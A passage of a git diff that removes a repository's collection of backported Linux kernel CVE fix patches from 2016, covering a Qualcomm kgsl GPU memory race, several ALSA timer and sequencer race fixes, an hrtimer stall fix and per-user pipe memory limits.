- 	struct kgsl_pagetable *pagetable = process->pagetable;
- 
- 	assert_spin_locked(&process->mem_lock);
-@@ -337,11 +330,22 @@ kgsl_mem_entry_track_gpuaddr(struct kgsl_process_private *process,
- 		pagetable = pagetable->mmu->securepagetable;
- 
- 	ret = kgsl_mmu_get_gpuaddr(pagetable, &entry->memdesc);
--	if (ret)
--		goto done;
- 
--	node = &process->mem_rb.rb_node;
-+done:
-+	return ret;
-+}
-+
-+static void kgsl_mem_entry_commit_mem_list(struct kgsl_process_private *process,
-+				struct kgsl_mem_entry *entry)
-+{
-+	struct rb_node **node;
-+	struct rb_node *parent = NULL;
-+
-+	if (!entry->memdesc.gpuaddr)
-+		return;
- 
-+	/* Insert mem entry in mem_rb tree */
-+	node = &process->mem_rb.rb_node;
- 	while (*node) {
- 		struct kgsl_mem_entry *cur;
- 
-@@ -356,9 +360,20 @@ kgsl_mem_entry_track_gpuaddr(struct kgsl_process_private *process,
- 
- 	rb_link_node(&entry->node, parent, node);
- 	rb_insert_color(&entry->node, &process->mem_rb);
-+}
- 
--done:
--	return ret;
-+static void kgsl_mem_entry_commit_process(struct kgsl_process_private *process,
-+				struct kgsl_mem_entry *entry)
-+{
-+	if (!entry)
-+		return;
-+
-+	spin_lock(&entry->priv->mem_lock);
-+	/* Insert mem entry in mem_rb tree */
-+	kgsl_mem_entry_commit_mem_list(process, entry);
-+	/* Replace mem entry in mem_idr using id */
-+	idr_replace(&entry->priv->mem_idr, entry, entry->id);
-+	spin_unlock(&entry->priv->mem_lock);
- }
- 
- /**
-@@ -407,7 +422,8 @@ kgsl_mem_entry_attach_process(struct kgsl_mem_entry *entry,
- 		return -EBADF;
- 	idr_preload(GFP_KERNEL);
- 	spin_lock(&process->mem_lock);
--	id = idr_alloc(&process->mem_idr, entry, 1, 0, GFP_NOWAIT);
-+	/* Allocate the ID but don't attach the pointer just yet */
-+	id = idr_alloc(&process->mem_idr, NULL, 1, 0, GFP_NOWAIT);
- 	spin_unlock(&process->mem_lock);
- 	idr_preload_end();
- 
-@@ -3279,6 +3295,7 @@ long kgsl_ioctl_map_user_mem(struct kgsl_device_private *dev_priv,
- 
- 	trace_kgsl_mem_map(entry, param->fd);
- 
-+	kgsl_mem_entry_commit_process(private, entry);
- 	return result;
- 
- error_attach:
-@@ -3633,6 +3650,8 @@ long kgsl_ioctl_gpumem_alloc(struct kgsl_device_private *dev_priv,
- 	param->gpuaddr = entry->memdesc.gpuaddr;
- 	param->size = entry->memdesc.size;
- 	param->flags = entry->memdesc.flags;
-+
-+	kgsl_mem_entry_commit_process(private, entry);
- 	return result;
- err:
- 	kgsl_sharedmem_free(&entry->memdesc);
-@@ -3678,6 +3697,8 @@ long kgsl_ioctl_gpumem_alloc_id(struct kgsl_device_private *dev_priv,
- 	param->size = entry->memdesc.size;
- 	param->mmapsize = kgsl_memdesc_mmapsize(&entry->memdesc);
- 	param->gpuaddr = entry->memdesc.gpuaddr;
-+
-+	kgsl_mem_entry_commit_process(private, entry);
- 	return result;
- err:
- 	if (entry)
-@@ -4201,6 +4222,11 @@ static int kgsl_check_gpu_addr_collision(
- 			spin_lock(&private->mem_lock);
- 			kgsl_mem_entry_untrack_gpuaddr(private, entry);
- 			spin_unlock(&private->mem_lock);
-+		} else {
-+			/* Insert mem entry in mem_rb tree */
-+			spin_lock(&private->mem_lock);
-+			kgsl_mem_entry_commit_mem_list(private, entry);
-+			spin_unlock(&private->mem_lock);
- 		}
- 	} else {
- 		trace_kgsl_mem_unmapped_area_collision(entry, addr, len,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2504/ANY/0003.patch b/Patches/Linux_CVEs/CVE-2016-2504/ANY/0003.patch
deleted file mode 100644
index 0afa3534..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2504/ANY/0003.patch
+++ /dev/null
@@ -1,180 +0,0 @@
-From ec5feea777b07c0e1f9ce45b7f3179a3f6facf75 Mon Sep 17 00:00:00 2001
-From: Sunil Khatri <sunilkh@codeaurora.org>
-Date: Wed, 25 May 2016 15:36:30 +0530
-Subject: msm: kgsl: Defer adding the mem entry to a process
-
-If we add the mem entry pointer in the process idr and rb tree
-too early, other threads can do operations on the entry by
-guessing the ID or GPU address before the object gets returned
-by the creating operation.
-
-Allocate an ID for the object but don't assign the pointer until
-right before the creating function returns ensuring that another
-operation can't access it until it is ready.
-
-CRs-Fixed: 1002974
-Change-Id: Ic0dedbadc0dd2125bd2a7bcc152972c0555e07f8
-Signed-off-by: Jordan Crouse <jcrouse@codeaurora.org>
-Signed-off-by: Sunil Khatri <sunilkh@codeaurora.org>
----
- drivers/gpu/msm/kgsl.c | 84 ++++++++++++++++++++++++++++++++------------------
- 1 file changed, 54 insertions(+), 30 deletions(-)
-
-diff --git a/drivers/gpu/msm/kgsl.c b/drivers/gpu/msm/kgsl.c
-index 94b09f0..dab99c5 100644
---- a/drivers/gpu/msm/kgsl.c
-+++ b/drivers/gpu/msm/kgsl.c
-@@ -313,18 +313,13 @@ kgsl_mem_entry_destroy(struct kref *kref)
- EXPORT_SYMBOL(kgsl_mem_entry_destroy);
- 
- /**
-- * kgsl_mem_entry_track_gpuaddr - Insert a mem_entry in the address tree and
-- * assign it with a gpu address space before insertion
-+ * kgsl_mem_entry_track_gpuaddr - Get the entry gpu address space before
-+ * insertion to the process
-  * @process: the process that owns the memory
-  * @entry: the memory entry
-  *
-- * @returns - 0 on succcess else error code
-+ * @returns - 0 on success else error code
-  *
-- * Insert the kgsl_mem_entry in to the rb_tree for searching by GPU address.
-- * The assignment of gpu address and insertion into list needs to
-- * happen with the memory lock held to avoid race conditions between
-- * gpu address being selected and some other thread looking through the
-- * rb list in search of memory based on gpuaddr
-  * This function should be called with processes memory spinlock held
-  */
- static int
-@@ -332,8 +327,6 @@ kgsl_mem_entry_track_gpuaddr(struct kgsl_process_private *process,
- 				struct kgsl_mem_entry *entry)
- {
- 	int ret = 0;
--	struct rb_node **node;
--	struct rb_node *parent = NULL;
- 	struct kgsl_pagetable *pagetable = process->pagetable;
- 
- 	assert_spin_locked(&process->mem_lock);
-@@ -354,25 +347,6 @@ kgsl_mem_entry_track_gpuaddr(struct kgsl_process_private *process,
- 		pagetable = pagetable->mmu->securepagetable;
- 
- 	ret = kgsl_mmu_get_gpuaddr(pagetable, &entry->memdesc);
--	if (ret)
--		goto done;
--
--	node = &process->mem_rb.rb_node;
--
--	while (*node) {
--		struct kgsl_mem_entry *cur;
--
--		parent = *node;
--		cur = rb_entry(parent, struct kgsl_mem_entry, node);
--
--		if (entry->memdesc.gpuaddr < cur->memdesc.gpuaddr)
--			node = &parent->rb_left;
--		else
--			node = &parent->rb_right;
--	}
--
--	rb_link_node(&entry->node, parent, node);
--	rb_insert_color(&entry->node, &process->mem_rb);
- 
- done:
- 	return ret;
-@@ -398,6 +372,47 @@ kgsl_mem_entry_untrack_gpuaddr(struct kgsl_process_private *process,
- 	}
- }
- 
-+static void kgsl_mem_entry_commit_mem_list(struct kgsl_process_private *process,
-+				struct kgsl_mem_entry *entry)
-+{
-+	struct rb_node **node;
-+	struct rb_node *parent = NULL;
-+
-+	if (!entry->memdesc.gpuaddr)
-+		return;
-+
-+	/* Insert mem entry in mem_rb tree */
-+	node = &process->mem_rb.rb_node;
-+	while (*node) {
-+		struct kgsl_mem_entry *cur;
-+
-+		parent = *node;
-+		cur = rb_entry(parent, struct kgsl_mem_entry, node);
-+
-+		if (entry->memdesc.gpuaddr < cur->memdesc.gpuaddr)
-+			node = &parent->rb_left;
-+		else
-+			node = &parent->rb_right;
-+	}
-+
-+	rb_link_node(&entry->node, parent, node);
-+	rb_insert_color(&entry->node, &process->mem_rb);
-+}
-+
-+static void kgsl_mem_entry_commit_process(struct kgsl_process_private *process,
-+				struct kgsl_mem_entry *entry)
-+{
-+	if (!entry)
-+		return;
-+
-+	spin_lock(&entry->priv->mem_lock);
-+	/* Insert mem entry in mem_rb tree */
-+	kgsl_mem_entry_commit_mem_list(process, entry);
-+	/* Replace mem entry in mem_idr using id */
-+	idr_replace(&entry->priv->mem_idr, entry, entry->id);
-+	spin_unlock(&entry->priv->mem_lock);
-+}
-+
- /**
-  * kgsl_mem_entry_attach_process - Attach a mem_entry to its owner process
-  * @entry: the memory entry
-@@ -424,7 +439,8 @@ kgsl_mem_entry_attach_process(struct kgsl_mem_entry *entry,
- 		return -EBADF;
- 	idr_preload(GFP_KERNEL);
- 	spin_lock(&process->mem_lock);
--	id = idr_alloc(&process->mem_idr, entry, 1, 0, GFP_NOWAIT);
-+	/* Allocate the ID but don't attach the pointer just yet */
-+	id = idr_alloc(&process->mem_idr, NULL, 1, 0, GFP_NOWAIT);
- 	spin_unlock(&process->mem_lock);
- 	idr_preload_end();
- 
-@@ -2400,6 +2416,7 @@ long kgsl_ioctl_gpuobj_import(struct kgsl_device_private *dev_priv,
- 
- 	trace_kgsl_mem_map(entry, fd);
- 
-+	kgsl_mem_entry_commit_process(private, entry);
- 	return 0;
- 
- unmap:
-@@ -2671,6 +2688,7 @@ long kgsl_ioctl_map_user_mem(struct kgsl_device_private *dev_priv,
- 
- 	trace_kgsl_mem_map(entry, param->fd);
- 
-+	kgsl_mem_entry_commit_process(private, entry);
- 	return result;
- 
- error_attach:
-@@ -3084,6 +3102,7 @@ static struct kgsl_mem_entry *gpumem_alloc_entry(
- 			entry->memdesc.size);
- 	trace_kgsl_mem_alloc(entry);
- 
-+	kgsl_mem_entry_commit_process(private, entry);
- 	return entry;
- err:
- 	kfree(entry);
-@@ -3579,6 +3598,11 @@ static int kgsl_check_gpu_addr_collision(
- 			spin_lock(&private->mem_lock);
- 			kgsl_mem_entry_untrack_gpuaddr(private, entry);
- 			spin_unlock(&private->mem_lock);
-+		} else {
-+			/* Insert mem entry in mem_rb tree */
-+			spin_lock(&private->mem_lock);
-+			kgsl_mem_entry_commit_mem_list(private, entry);
-+			spin_unlock(&private->mem_lock);
- 		}
- 	} else {
- 		trace_kgsl_mem_unmapped_area_collision(entry, addr, len,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2544/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2544/ANY/0001.patch
deleted file mode 100644
index 09cb3cc1..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2544/ANY/0001.patch
+++ /dev/null
@@ -1,38 +0,0 @@
-From 3567eb6af614dac436c4b16a8d426f9faed639b3 Mon Sep 17 00:00:00 2001
-From: Takashi Iwai <tiwai@suse.de>
-Date: Tue, 12 Jan 2016 15:36:27 +0100
-Subject: ALSA: seq: Fix race at timer setup and close
-
-ALSA sequencer code has an open race between the timer setup ioctl and
-the close of the client.  This was triggered by syzkaller fuzzer, and
-a use-after-free was caught there as a result.
-
-This patch papers over it by adding a proper queue->timer_mutex lock
-around the timer-related calls in the relevant code path.
-
-Reported-by: Dmitry Vyukov <dvyukov@google.com>
-Tested-by: Dmitry Vyukov <dvyukov@google.com>
-Cc: <stable@vger.kernel.org>
-Signed-off-by: Takashi Iwai <tiwai@suse.de>
----
- sound/core/seq/seq_queue.c | 2 ++
- 1 file changed, 2 insertions(+)
-
-diff --git a/sound/core/seq/seq_queue.c b/sound/core/seq/seq_queue.c
-index 7dfd0f4..0bec02e 100644
---- a/sound/core/seq/seq_queue.c
-+++ b/sound/core/seq/seq_queue.c
-@@ -142,8 +142,10 @@ static struct snd_seq_queue *queue_new(int owner, int locked)
- static void queue_delete(struct snd_seq_queue *q)
- {
- 	/* stop and release the timer */
-+	mutex_lock(&q->timer_mutex);
- 	snd_seq_timer_stop(q->timer);
- 	snd_seq_timer_close(q);
-+	mutex_unlock(&q->timer_mutex);
- 	/* wait until access free */
- 	snd_use_lock_sync(&q->use_lock);
- 	/* release resources... */
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2545/^4.4/0001.patch b/Patches/Linux_CVEs/CVE-2016-2545/^4.4/0001.patch
deleted file mode 100644
index 0c88b965..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2545/^4.4/0001.patch
+++ /dev/null
@@ -1,37 +0,0 @@
-From ee8413b01045c74340aa13ad5bdf905de32be736 Mon Sep 17 00:00:00 2001
-From: Takashi Iwai <tiwai@suse.de>
-Date: Wed, 13 Jan 2016 21:35:06 +0100
-Subject: ALSA: timer: Fix double unlink of active_list
-
-ALSA timer instance object has a couple of linked lists and they are
-unlinked unconditionally at snd_timer_stop().  Meanwhile
-snd_timer_interrupt() unlinks it, but it calls list_del() which leaves
-the element list itself unchanged.  This ends up with unlinking twice,
-and it was caught by syzkaller fuzzer.
-
-The fix is to use list_del_init() variant properly there, too.
-
-Reported-by: Dmitry Vyukov <dvyukov@google.com>
-Tested-by: Dmitry Vyukov <dvyukov@google.com>
-Cc: <stable@vger.kernel.org>
-Signed-off-by: Takashi Iwai <tiwai@suse.de>
----
- sound/core/timer.c | 2 +-
- 1 file changed, 1 insertion(+), 1 deletion(-)
-
-diff --git a/sound/core/timer.c b/sound/core/timer.c
-index 31f40f0..9241784df 100644
---- a/sound/core/timer.c
-+++ b/sound/core/timer.c
-@@ -694,7 +694,7 @@ void snd_timer_interrupt(struct snd_timer * timer, unsigned long ticks_left)
- 		} else {
- 			ti->flags &= ~SNDRV_TIMER_IFLG_RUNNING;
- 			if (--timer->running)
--				list_del(&ti->active_list);
-+				list_del_init(&ti->active_list);
- 		}
- 		if ((timer->hw.flags & SNDRV_TIMER_HW_TASKLET) ||
- 		    (ti->flags & SNDRV_TIMER_IFLG_FAST))
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2546/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2546/ANY/0001.patch
deleted file mode 100644
index 0c11987f..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2546/ANY/0001.patch
+++ /dev/null
@@ -1,122 +0,0 @@
-From af368027a49a751d6ff4ee9e3f9961f35bb4fede Mon Sep 17 00:00:00 2001
-From: Takashi Iwai <tiwai@suse.de>
-Date: Wed, 13 Jan 2016 17:48:01 +0100
-Subject: ALSA: timer: Fix race among timer ioctls
-
-ALSA timer ioctls have an open race and this may lead to a
-use-after-free of timer instance object.  A simplistic fix is to make
-each ioctl exclusive.  We have already tread_sem for controlling the
-tread, and extend this as a global mutex to be applied to each ioctl.
-
-The downside is, of course, the worse concurrency.  But these ioctls
-aren't to be parallel accessible, in anyway, so it should be fine to
-serialize there.
-
-Reported-by: Dmitry Vyukov <dvyukov@google.com>
-Tested-by: Dmitry Vyukov <dvyukov@google.com>
-Cc: <stable@vger.kernel.org>
-Signed-off-by: Takashi Iwai <tiwai@suse.de>
----
- sound/core/timer.c | 32 +++++++++++++++++++-------------
- 1 file changed, 19 insertions(+), 13 deletions(-)
-
-diff --git a/sound/core/timer.c b/sound/core/timer.c
-index 9241784df..3810ee8 100644
---- a/sound/core/timer.c
-+++ b/sound/core/timer.c
-@@ -73,7 +73,7 @@ struct snd_timer_user {
- 	struct timespec tstamp;		/* trigger tstamp */
- 	wait_queue_head_t qchange_sleep;
- 	struct fasync_struct *fasync;
--	struct mutex tread_sem;
-+	struct mutex ioctl_lock;
- };
- 
- /* list of timers */
-@@ -1253,7 +1253,7 @@ static int snd_timer_user_open(struct inode *inode, struct file *file)
- 		return -ENOMEM;
- 	spin_lock_init(&tu->qlock);
- 	init_waitqueue_head(&tu->qchange_sleep);
--	mutex_init(&tu->tread_sem);
-+	mutex_init(&tu->ioctl_lock);
- 	tu->ticks = 1;
- 	tu->queue_size = 128;
- 	tu->queue = kmalloc(tu->queue_size * sizeof(struct snd_timer_read),
-@@ -1273,8 +1273,10 @@ static int snd_timer_user_release(struct inode *inode, struct file *file)
- 	if (file->private_data) {
- 		tu = file->private_data;
- 		file->private_data = NULL;
-+		mutex_lock(&tu->ioctl_lock);
- 		if (tu->timeri)
- 			snd_timer_close(tu->timeri);
-+		mutex_unlock(&tu->ioctl_lock);
- 		kfree(tu->queue);
- 		kfree(tu->tqueue);
- 		kfree(tu);
-@@ -1512,7 +1514,6 @@ static int snd_timer_user_tselect(struct file *file,
- 	int err = 0;
- 
- 	tu = file->private_data;
--	mutex_lock(&tu->tread_sem);
- 	if (tu->timeri) {
- 		snd_timer_close(tu->timeri);
- 		tu->timeri = NULL;
-@@ -1556,7 +1557,6 @@ static int snd_timer_user_tselect(struct file *file,
- 	}
- 
-       __err:
--      	mutex_unlock(&tu->tread_sem);
- 	return err;
- }
- 
-@@ -1769,7 +1769,7 @@ enum {
- 	SNDRV_TIMER_IOCTL_PAUSE_OLD = _IO('T', 0x23),
- };
- 
--static long snd_timer_user_ioctl(struct file *file, unsigned int cmd,
-+static long __snd_timer_user_ioctl(struct file *file, unsigned int cmd,
- 				 unsigned long arg)
- {
- 	struct snd_timer_user *tu;
-@@ -1786,17 +1786,11 @@ static long snd_timer_user_ioctl(struct file *file, unsigned int cmd,
- 	{
- 		int xarg;
- 
--		mutex_lock(&tu->tread_sem);
--		if (tu->timeri)	{	/* too late */
--			mutex_unlock(&tu->tread_sem);
-+		if (tu->timeri)	/* too late */
- 			return -EBUSY;
--		}
--		if (get_user(xarg, p)) {
--			mutex_unlock(&tu->tread_sem);
-+		if (get_user(xarg, p))
- 			return -EFAULT;
--		}
- 		tu->tread = xarg ? 1 : 0;
--		mutex_unlock(&tu->tread_sem);
- 		return 0;
- 	}
- 	case SNDRV_TIMER_IOCTL_GINFO:
-@@ -1829,6 +1823,18 @@ static long snd_timer_user_ioctl(struct file *file, unsigned int cmd,
- 	return -ENOTTY;
- }
- 
-+static long snd_timer_user_ioctl(struct file *file, unsigned int cmd,
-+				 unsigned long arg)
-+{
-+	struct snd_timer_user *tu = file->private_data;
-+	long ret;
-+
-+	mutex_lock(&tu->ioctl_lock);
-+	ret = __snd_timer_user_ioctl(file, cmd, arg);
-+	mutex_unlock(&tu->ioctl_lock);
-+	return ret;
-+}
-+
- static int snd_timer_user_fasync(int fd, struct file * file, int on)
- {
- 	struct snd_timer_user *tu;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2547/^4.4/0001.patch b/Patches/Linux_CVEs/CVE-2016-2547/^4.4/0001.patch
deleted file mode 100644
index 7df556be..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2547/^4.4/0001.patch
+++ /dev/null
@@ -1,101 +0,0 @@
-From b5a663aa426f4884c71cd8580adae73f33570f0d Mon Sep 17 00:00:00 2001
-From: Takashi Iwai <tiwai@suse.de>
-Date: Thu, 14 Jan 2016 16:30:58 +0100
-Subject: ALSA: timer: Harden slave timer list handling
-
-A slave timer instance might be still accessible in a racy way while
-operating the master instance as it lacks of locking.  Since the
-master operation is mostly protected with timer->lock, we should cope
-with it while changing the slave instance, too.  Also, some linked
-lists (active_list and ack_list) of slave instances aren't unlinked
-immediately at stopping or closing, and this may lead to unexpected
-accesses.
-
-This patch tries to address these issues.  It adds spin lock of
-timer->lock (either from master or slave, which is equivalent) in a
-few places.  For avoiding a deadlock, we ensure that the global
-slave_active_lock is always locked at first before each timer lock.
-
-Also, ack and active_list of slave instances are properly unlinked at
-snd_timer_stop() and snd_timer_close().
-
-Last but not least, remove the superfluous call of _snd_timer_stop()
-at removing slave links.  This is a noop, and calling it may confuse
-readers wrt locking.  Further cleanup will follow in a later patch.
-
-Actually we've got reports of use-after-free by syzkaller fuzzer, and
-this hopefully fixes these issues.
-
-Reported-by: Dmitry Vyukov <dvyukov@google.com>
-Cc: <stable@vger.kernel.org>
-Signed-off-by: Takashi Iwai <tiwai@suse.de>
----
- sound/core/timer.c | 18 ++++++++++++++----
- 1 file changed, 14 insertions(+), 4 deletions(-)
-
-diff --git a/sound/core/timer.c b/sound/core/timer.c
-index 3810ee8..4e8d7bf 100644
---- a/sound/core/timer.c
-+++ b/sound/core/timer.c
-@@ -215,11 +215,13 @@ static void snd_timer_check_master(struct snd_timer_instance *master)
- 		    slave->slave_id == master->slave_id) {
- 			list_move_tail(&slave->open_list, &master->slave_list_head);
- 			spin_lock_irq(&slave_active_lock);
-+			spin_lock(&master->timer->lock);
- 			slave->master = master;
- 			slave->timer = master->timer;
- 			if (slave->flags & SNDRV_TIMER_IFLG_RUNNING)
- 				list_add_tail(&slave->active_list,
- 					      &master->slave_active_head);
-+			spin_unlock(&master->timer->lock);
- 			spin_unlock_irq(&slave_active_lock);
- 		}
- 	}
-@@ -346,15 +348,18 @@ int snd_timer_close(struct snd_timer_instance *timeri)
- 		    timer->hw.close)
- 			timer->hw.close(timer);
- 		/* remove slave links */
-+		spin_lock_irq(&slave_active_lock);
-+		spin_lock(&timer->lock);
- 		list_for_each_entry_safe(slave, tmp, &timeri->slave_list_head,
- 					 open_list) {
--			spin_lock_irq(&slave_active_lock);
--			_snd_timer_stop(slave, 1, SNDRV_TIMER_EVENT_RESOLUTION);
- 			list_move_tail(&slave->open_list, &snd_timer_slave_list);
- 			slave->master = NULL;
- 			slave->timer = NULL;
--			spin_unlock_irq(&slave_active_lock);
-+			list_del_init(&slave->ack_list);
-+			list_del_init(&slave->active_list);
- 		}
-+		spin_unlock(&timer->lock);
-+		spin_unlock_irq(&slave_active_lock);
- 		mutex_unlock(&register_mutex);
- 	}
-  out:
-@@ -441,9 +446,12 @@ static int snd_timer_start_slave(struct snd_timer_instance *timeri)
- 
- 	spin_lock_irqsave(&slave_active_lock, flags);
- 	timeri->flags |= SNDRV_TIMER_IFLG_RUNNING;
--	if (timeri->master)
-+	if (timeri->master && timeri->timer) {
-+		spin_lock(&timeri->timer->lock);
- 		list_add_tail(&timeri->active_list,
- 			      &timeri->master->slave_active_head);
-+		spin_unlock(&timeri->timer->lock);
-+	}
- 	spin_unlock_irqrestore(&slave_active_lock, flags);
- 	return 1; /* delayed start */
- }
-@@ -489,6 +497,8 @@ static int _snd_timer_stop(struct snd_timer_instance * timeri,
- 		if (!keep_flag) {
- 			spin_lock_irqsave(&slave_active_lock, flags);
- 			timeri->flags &= ~SNDRV_TIMER_IFLG_RUNNING;
-+			list_del_init(&timeri->ack_list);
-+			list_del_init(&timeri->active_list);
- 			spin_unlock_irqrestore(&slave_active_lock, flags);
- 		}
- 		goto __end;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2549/^4.4/0001.patch b/Patches/Linux_CVEs/CVE-2016-2549/^4.4/0001.patch
deleted file mode 100644
index cede879f..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2549/^4.4/0001.patch
+++ /dev/null
@@ -1,54 +0,0 @@
-From 2ba1fe7a06d3624f9a7586d672b55f08f7c670f3 Mon Sep 17 00:00:00 2001
-From: Takashi Iwai <tiwai@suse.de>
-Date: Mon, 18 Jan 2016 13:52:47 +0100
-Subject: ALSA: hrtimer: Fix stall by hrtimer_cancel()
-
-hrtimer_cancel() waits for the completion from the callback, thus it
-must not be called inside the callback itself.  This was already a
-problem in the past with ALSA hrtimer driver, and the early commit
-[fcfdebe70759: ALSA: hrtimer - Fix lock-up] tried to address it.
-
-However, the previous fix is still insufficient: it may still cause a
-lockup when the ALSA timer instance reprograms itself in its callback.
-Then it invokes the start function even in snd_timer_interrupt() that
-is called in hrtimer callback itself, results in a CPU stall.  This is
-no hypothetical problem but actually triggered by syzkaller fuzzer.
-
-This patch tries to fix the issue again.  Now we call
-hrtimer_try_to_cancel() at both start and stop functions so that it
-won't fall into a deadlock, yet giving some chance to cancel the queue
-if the functions have been called outside the callback.  The proper
-hrtimer_cancel() is called in anyway at closing, so this should be
-enough.
-
-Reported-and-tested-by: Dmitry Vyukov <dvyukov@google.com>
-Cc: <stable@vger.kernel.org>
-Signed-off-by: Takashi Iwai <tiwai@suse.de>
----
- sound/core/hrtimer.c | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
-
-diff --git a/sound/core/hrtimer.c b/sound/core/hrtimer.c
-index f845ecf..656d9a9 100644
---- a/sound/core/hrtimer.c
-+++ b/sound/core/hrtimer.c
-@@ -90,7 +90,7 @@ static int snd_hrtimer_start(struct snd_timer *t)
- 	struct snd_hrtimer *stime = t->private_data;
- 
- 	atomic_set(&stime->running, 0);
--	hrtimer_cancel(&stime->hrt);
-+	hrtimer_try_to_cancel(&stime->hrt);
- 	hrtimer_start(&stime->hrt, ns_to_ktime(t->sticks * resolution),
- 		      HRTIMER_MODE_REL);
- 	atomic_set(&stime->running, 1);
-@@ -101,6 +101,7 @@ static int snd_hrtimer_stop(struct snd_timer *t)
- {
- 	struct snd_hrtimer *stime = t->private_data;
- 	atomic_set(&stime->running, 0);
-+	hrtimer_try_to_cancel(&stime->hrt);
- 	return 0;
- }
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-2847/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-2847/ANY/0001.patch
deleted file mode 100644
index 843bdd83..00000000
--- a/Patches/Linux_CVEs/CVE-2016-2847/ANY/0001.patch
+++ /dev/null
@@ -1,250 +0,0 @@
-From 759c01142a5d0f364a462346168a56de28a80f52 Mon Sep 17 00:00:00 2001
-From: Willy Tarreau <w@1wt.eu>
-Date: Mon, 18 Jan 2016 16:36:09 +0100
-Subject: pipe: limit the per-user amount of pages allocated in pipes
-
-On no-so-small systems, it is possible for a single process to cause an
-OOM condition by filling large pipes with data that are never read. A
-typical process filling 4000 pipes with 1 MB of data will use 4 GB of
-memory. On small systems it may be tricky to set the pipe max size to
-prevent this from happening.
-
-This patch makes it possible to enforce a per-user soft limit above
-which new pipes will be limited to a single page, effectively limiting
-them to 4 kB each, as well as a hard limit above which no new pipes may
-be created for this user. This has the effect of protecting the system
-against memory abuse without hurting other users, and still allowing
-pipes to work correctly though with less data at once.
-
-The limit are controlled by two new sysctls : pipe-user-pages-soft, and
-pipe-user-pages-hard. Both may be disabled by setting them to zero. The
-default soft limit allows the default number of FDs per process (1024)
-to create pipes of the default size (64kB), thus reaching a limit of 64MB
-before starting to create only smaller pipes. With 256 processes limited
-to 1024 FDs each, this results in 1024*64kB + (256*1024 - 1024) * 4kB =
-1084 MB of memory allocated for a user. The hard limit is disabled by
-default to avoid breaking existing applications that make intensive use
-of pipes (eg: for splicing).
-
-Reported-by: socketpair@gmail.com
-Reported-by: Tetsuo Handa <penguin-kernel@I-love.SAKURA.ne.jp>
-Mitigates: CVE-2013-4312 (Linux 2.0+)
-Suggested-by: Linus Torvalds <torvalds@linux-foundation.org>
-Signed-off-by: Willy Tarreau <w@1wt.eu>
-Signed-off-by: Al Viro <viro@zeniv.linux.org.uk>
----
- Documentation/sysctl/fs.txt | 23 ++++++++++++++++++++++
- fs/pipe.c                   | 47 +++++++++++++++++++++++++++++++++++++++++++--
- include/linux/pipe_fs_i.h   |  4 ++++
- include/linux/sched.h       |  1 +
- kernel/sysctl.c             | 14 ++++++++++++++
- 5 files changed, 87 insertions(+), 2 deletions(-)
-
-diff --git a/Documentation/sysctl/fs.txt b/Documentation/sysctl/fs.txt
-index 88152f2..302b5ed 100644
---- a/Documentation/sysctl/fs.txt
-+++ b/Documentation/sysctl/fs.txt
-@@ -32,6 +32,8 @@ Currently, these files are in /proc/sys/fs:
- - nr_open
- - overflowuid
- - overflowgid
-+- pipe-user-pages-hard
-+- pipe-user-pages-soft
- - protected_hardlinks
- - protected_symlinks
- - suid_dumpable
-@@ -159,6 +161,27 @@ The default is 65534.
- 
- ==============================================================
- 
-+pipe-user-pages-hard:
-+
-+Maximum total number of pages a non-privileged user may allocate for pipes.
-+Once this limit is reached, no new pipes may be allocated until usage goes
-+below the limit again. When set to 0, no limit is applied, which is the default
-+setting.
-+
-+==============================================================
-+
-+pipe-user-pages-soft:
-+
-+Maximum total number of pages a non-privileged user may allocate for pipes
-+before the pipe size gets limited to a single page. Once this limit is reached,
-+new pipes will be limited to a single page in size for this user in order to
-+limit total memory usage, and trying to increase them using fcntl() will be
-+denied until usage goes below the limit again. The default value allows to
-+allocate up to 1024 pipes at their default size. When set to 0, no limit is
-+applied.
-+
-+==============================================================
-+
- protected_hardlinks:
- 
- A long-standing class of security issues is the hardlink-based
-diff --git a/fs/pipe.c b/fs/pipe.c
-index 42cf8dd..ab8dad3 100644
---- a/fs/pipe.c
-+++ b/fs/pipe.c
-@@ -38,6 +38,12 @@ unsigned int pipe_max_size = 1048576;
-  */
- unsigned int pipe_min_size = PAGE_SIZE;
- 
-+/* Maximum allocatable pages per user. Hard limit is unset by default, soft
-+ * matches default values.
-+ */
-+unsigned long pipe_user_pages_hard;
-+unsigned long pipe_user_pages_soft = PIPE_DEF_BUFFERS * INR_OPEN_CUR;
-+
- /*
-  * We use a start+len construction, which provides full use of the 
-  * allocated memory.
-@@ -583,20 +589,49 @@ pipe_fasync(int fd, struct file *filp, int on)
- 	return retval;
- }
- 
-+static void account_pipe_buffers(struct pipe_inode_info *pipe,
-+                                 unsigned long old, unsigned long new)
-+{
-+	atomic_long_add(new - old, &pipe->user->pipe_bufs);
-+}
-+
-+static bool too_many_pipe_buffers_soft(struct user_struct *user)
-+{
-+	return pipe_user_pages_soft &&
-+	       atomic_long_read(&user->pipe_bufs) >= pipe_user_pages_soft;
-+}
-+
-+static bool too_many_pipe_buffers_hard(struct user_struct *user)
-+{
-+	return pipe_user_pages_hard &&
-+	       atomic_long_read(&user->pipe_bufs) >= pipe_user_pages_hard;
-+}
-+
- struct pipe_inode_info *alloc_pipe_info(void)
- {
- 	struct pipe_inode_info *pipe;
- 
- 	pipe = kzalloc(sizeof(struct pipe_inode_info), GFP_KERNEL);
- 	if (pipe) {
--		pipe->bufs = kzalloc(sizeof(struct pipe_buffer) * PIPE_DEF_BUFFERS, GFP_KERNEL);
-+		unsigned long pipe_bufs = PIPE_DEF_BUFFERS;
-+		struct user_struct *user = get_current_user();
-+
